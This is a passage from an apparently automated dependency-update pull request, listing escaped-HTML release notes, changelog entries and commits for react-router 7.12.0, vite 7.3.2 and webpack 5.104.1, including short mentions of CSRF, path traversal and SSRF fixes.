href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v795\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v795\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.4\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v794\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v794\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.3\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v793\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v793\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.2\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v792\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v792\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.1\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v791\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v791\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.9.0\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v790\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v790\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.8.2\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v782\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v782\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.8.1\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v781\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v781\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.8.0\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v780\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v780\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.7.1\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v771\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v771\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev7.7.0\u003c/h2\u003e\n\u003cp\u003eSee the changelog for release notes: \u003ca href=\"https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v770\"\u003ehttps://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v770\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/remix-run/react-router/blob/main/packages/react-router/CHANGELOG.md\"\u003ereact-router's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e7.12.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd additional layer of CSRF protection by rejecting submissions to UI routes from external origins. If you need to permit access to specific external origins, you can specify them in the \u003ccode\u003ereact-router.config.ts\u003c/code\u003e config \u003ccode\u003eallowedActionOrigins\u003c/code\u003e field. (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14708\"\u003e#14708\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFix \u003ccode\u003egeneratePath\u003c/code\u003e when used with suffixed params (i.e., \u0026quot;/books/:id.json\u0026quot;) (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14269\"\u003e#14269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eExport \u003ccode\u003eUNSAFE_createMemoryHistory\u003c/code\u003e and \u003ccode\u003eUNSAFE_createHashHistory\u003c/code\u003e alongside \u003ccode\u003eUNSAFE_createBrowserHistory\u003c/code\u003e for consistency. These are not intended to be used for new apps but intended to help apps usiong \u003ccode\u003eunstable_HistoryRouter\u003c/code\u003e migrate from v6-\u0026gt;v7 so they can adopt the newer APIs. (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14663\"\u003e#14663\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eEscape HTML in scroll restoration keys (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14705\"\u003e#14705\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eValidate redirect locations (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14706\"\u003e#14706\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e[UNSTABLE] Pass \u003ccode\u003e\u0026lt;Scripts nonce\u0026gt;\u003c/code\u003e value through to the underlying \u003ccode\u003eimportmap\u003c/code\u003e \u003ccode\u003escript\u003c/code\u003e tag when using \u003ccode\u003efuture.unstable_subResourceIntegrity\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14675\"\u003e#14675\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e[UNSTABLE] Add a new \u003ccode\u003efuture.unstable_trailingSlashAwareDataRequests\u003c/code\u003e flag to provide consistent behavior of \u003ccode\u003erequest.pathname\u003c/code\u003e inside \u003ccode\u003emiddleware\u003c/code\u003e, \u003ccode\u003eloader\u003c/code\u003e, and \u003ccode\u003eaction\u003c/code\u003e functions on document and data requests when a trailing slash is present in the browser URL. (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14644\"\u003e#14644\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eCurrently, your HTTP and \u003ccode\u003erequest\u003c/code\u003e pathnames would be as follows for \u003ccode\u003e/a/b/c\u003c/code\u003e and \u003ccode\u003e/a/b/c/\u003c/code\u003e\u003c/p\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003eURL \u003ccode\u003e/a/b/c\u003c/code\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003eHTTP pathname\u003c/strong\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003e\u003ccode\u003erequest\u003c/code\u003e pathname`\u003c/strong\u003e\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eDocument\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eData\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c.data\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003eURL \u003ccode\u003e/a/b/c/\u003c/code\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003eHTTP pathname\u003c/strong\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003e\u003ccode\u003erequest\u003c/code\u003e pathname`\u003c/strong\u003e\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eDocument\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c/\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c/\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eData\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c.data\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e ⚠️\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003cp\u003eWith this flag enabled, these pathnames will be made consistent though a new \u003ccode\u003e_.data\u003c/code\u003e format for client-side \u003ccode\u003e.data\u003c/code\u003e requests:\u003c/p\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003eURL \u003ccode\u003e/a/b/c\u003c/code\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003eHTTP pathname\u003c/strong\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003e\u003ccode\u003erequest\u003c/code\u003e pathname`\u003c/strong\u003e\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eDocument\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eData\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c.data\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003eURL \u003ccode\u003e/a/b/c/\u003c/code\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003eHTTP pathname\u003c/strong\u003e\u003c/th\u003e\n\u003cth\u003e\u003cstrong\u003e\u003ccode\u003erequest\u003c/code\u003e pathname`\u003c/strong\u003e\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eDocument\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c/\u003c/code\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c/\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003cstrong\u003eData\u003c/strong\u003e\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c/_.data\u003c/code\u003e ⬅️\u003c/td\u003e\n\u003ctd\u003e\u003ccode\u003e/a/b/c/\u003c/code\u003e ✅\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003cp\u003eThis a bug fix but we are putting it behind an opt-in flag because it has the potential to be a \u0026quot;breaking bug fix\u0026quot; if you are relying on the URL format for any other application or caching logic.\u003c/p\u003e\n\u003cp\u003eEnabling this flag also changes the format of client side \u003ccode\u003e.data\u003c/code\u003e requests from \u003ccode\u003e/_root.data\u003c/code\u003e to \u003ccode\u003e/_.data\u003c/code\u003e when navigating to \u003ccode\u003e/\u003c/code\u003e to align with the new format. This does not impact the \u003ccode\u003erequest\u003c/code\u003e pathname which is still \u003ccode\u003e/\u003c/code\u003e in all cases.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ePreserve \u003ccode\u003eclientLoader.hydrate=true\u003c/code\u003e when using \u003ccode\u003e\u0026lt;HydratedRouter unstable_instrumentations\u0026gt;\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/remix-run/react-router/pull/14674\"\u003e#14674\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/26653a6bcbf8a9c5541f99dcfb526eafadf13434\"\u003e\u003ccode\u003e26653a6\u003c/code\u003e\u003c/a\u003e chore: Update version for release (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14712\"\u003e#14712\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/7ac2346873b4bba26d16c88e5cd5c5cb81ce6bb3\"\u003e\u003ccode\u003e7ac2346\u003c/code\u003e\u003c/a\u003e chore: Update version for release (pre) (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14709\"\u003e#14709\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/75b1ef50867d8fa3d5ffdab28245d5fec307d6a7\"\u003e\u003ccode\u003e75b1ef5\u003c/code\u003e\u003c/a\u003e Add origin checks for UI route submissions (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14708\"\u003e#14708\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/c05ef936fd9334f82aafa7e9087b78a8bf5c745d\"\u003e\u003ccode\u003ec05ef93\u003c/code\u003e\u003c/a\u003e Validate redirect locations (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14706\"\u003e#14706\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/c89c32c562a7723c45ee71dab1c892acaf7a608d\"\u003e\u003ccode\u003ec89c32c\u003c/code\u003e\u003c/a\u003e Escape HTML in scroll restoration keys (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14705\"\u003e#14705\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/cbcbf3091b55ef0067724fbd744f31c6d85eb1e6\"\u003e\u003ccode\u003ecbcbf30\u003c/code\u003e\u003c/a\u003e fix: pass nonce to importmap script when using subResourceIntegrity (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14675\"\u003e#14675\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/30f6c1d8142cbd2c26aef57cb2e12a4a8708eb4f\"\u003e\u003ccode\u003e30f6c1d\u003c/code\u003e\u003c/a\u003e fix(react-router): handle parameters with static suffixes in generatePath (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/1\"\u003e#1\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/7f140e098ecd83fd183468e0c0acae86589bfd11\"\u003e\u003ccode\u003e7f140e0\u003c/code\u003e\u003c/a\u003e Handle data requests with trailing slash consistently (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14644\"\u003e#14644\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/1954af63742be277162f8d5d054ca07e04a4a401\"\u003e\u003ccode\u003e1954af6\u003c/code\u003e\u003c/a\u003e Preserve hydrate property on client loaders during instrumentation (\u003ca href=\"https://github.com/remix-run/react-router/tree/HEAD/packages/react-router/issues/14674\"\u003e#14674\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/remix-run/react-router/commit/5ce5cd4ebfc6959bf8d667075cb5b9ae0a9d5476\"\u003e\u003ccode\u003e5ce5cd4\u003c/code\u003e\u003c/a\u003e chore: format\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/remix-run/react-router/commits/react-router@7.12.0/packages/react-router\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for react-router since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 7.3.1 to 7.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/releases\"\u003evite's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.3.2\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e\u003ca href=\"https://github.com/vitejs/vite/compare/v7.3.1...v7.3.2\"\u003e7.3.2\u003c/a\u003e (2026-04-06)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eavoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22161\"\u003e#22161\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e09d8c90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ebackport \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22162\"\u003e#22162\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e19db0f2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22160\"\u003e#22160\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003ef8103cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/cc383e07b66d4c5a9768fcb570e0af812cb8d999\"\u003e\u003ccode\u003ecc383e0\u003c/code\u003e\u003c/a\u003e release: v7.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e\u003ccode\u003e09d8c90\u003c/code\u003e\u003c/a\u003e fix: avoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22161\"\u003e#22161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003e\u003ccode\u003ef8103cc\u003c/code\u003e\u003c/a\u003e fix: check \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22160\"\u003e#22160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e\u003ccode\u003e19db0f2\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22162\"\u003e#22162\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/vitejs/vite/commits/v7.3.2/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack` from 5.90.0 to 5.104.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/releases\"\u003ewebpack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.104.1\u003c/h2\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.104.0\u003c/h2\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.103.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003eDotenvPlugin\u003c/code\u003e and top level \u003ccode\u003edotenv\u003c/code\u003e option to enable this plugin\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eWebpackManifestPlugin\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdded support the \u003ccode\u003eignoreList\u003c/code\u003e option in devtool plugins\u003c/li\u003e\n\u003cli\u003eAllow to use custom javascript parse function\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/blob/main/CHANGELOG.md\"\u003ewebpack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development 